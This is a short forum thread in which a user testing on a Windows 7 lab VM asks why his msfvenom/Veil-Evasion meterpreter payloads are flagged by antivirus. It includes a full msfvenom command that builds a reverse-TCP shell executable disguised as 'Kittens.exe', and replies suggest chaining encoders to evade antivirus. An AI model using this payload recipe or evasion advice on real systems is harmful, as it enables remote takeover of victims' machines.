Jump to content

Recommended Posts

Posted

I've been pentesting on on my Windows 7 VM lately with shikata_ga_nai encoded payloads I've been generating vai Veil-Evasion and msfvenom.

For example, I have been using the windows/meterpreter/reverse_tcp reverse stager to call back to me on my handler on kali and it works BUT thats only when AV is turned off, otherwise my payloads are detected by AV (AVG)

Are shikata_ga_nai signatures now detectable via AV? Or perhaps I'm encoding my payloads wrong?

Here is an example of one of my payloads

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -a x86 -e x86/shikata_ga_nai -f exe LHOST=192.168.32.130 LPORT=4444 > Kittens.exe

Posted

Yeah I'm pretty sure that most A/V will detect shikata-ga-nai. This method has been around for some time. You can try to run the payload through several encoders to evade A/V, but that is not guaranteed either.

Good luck with it!

Posted

I currently have a video i finished on using Veil Framework i just need to spend some time adding the voice over to the to go with the video i never got around to it was messing around with my old microphone to see if it would be good to use now or not didn't like the audio turn out so i gotta redo it.

however i have a old video that i did using Veil Framework reason im doing the video over again is because i pronouced the Veil Framework wrong through the whole video.

So i sounded like a complete idiot.

https://www.youtube.com/watch?v=9E5RbzsnJAo

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...